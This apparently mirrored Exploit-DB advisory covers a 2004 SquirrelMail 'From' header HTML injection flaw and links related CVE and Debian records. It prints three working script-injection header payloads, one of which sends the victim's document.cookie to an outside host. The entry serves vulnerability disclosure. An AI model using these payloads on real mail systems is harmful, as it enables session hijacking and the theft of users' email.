Lucene search
AnonymousEDB-ID:24167HistoryJun 03, 2004 - 12:00 a.m.
SquirrelMail 1.2.x - From Email Header HTML Injection
2004-06-0300:00:00
anonymous
www.exploit-db.com
891
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/10450/info
SquirrelMail is reported to be prone to a 'from' field email header HTML injection vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied email header strings.
An attacker can exploit this issue to gain access to an unsuspecting user's cookie based authentication credentials; disclosure of personal email is possible. Other attacks are also possible.
From:<!--<>(-->John Doe<script>window.alert(document.cookie);</script><>
From:(<!--(--><script>document.location='http://www.rs-labs.com/?'+document.cookie;</script><>
From:<!--<>(-->John Doe<script>document.cookie='PHPSESSID=xxx;path=/';</script><> Related
openvas
openvas
SquirrelMail From Email header HTML injection vulnerability
2005-11-03 00:00:00
Debian Security Advisory DSA 535-1 (squirrelmail)
2008-01-17 00:00:00
Debian: Security Advisory (DSA-535)
2008-01-17 00:00:00
nessus
nessus
SquirrelMail < 1.2.11 Multiple Script XSS
2004-08-06 00:00:00
Debian DSA-535-1 : squirrelmail - several vulnerabilities
2004-09-29 00:00:00
nvd
nvd
CVE-2004-0639
2004-08-06 04:00:00
cvelist
cvelist
CVE-2004-0639
2004-07-09 04:00:00
cve
cve
CVE-2004-0639
2004-08-06 04:00:00
osv
osv
squirrelmail - several vulnerabilities
2004-08-02 00:00:00
debian
debian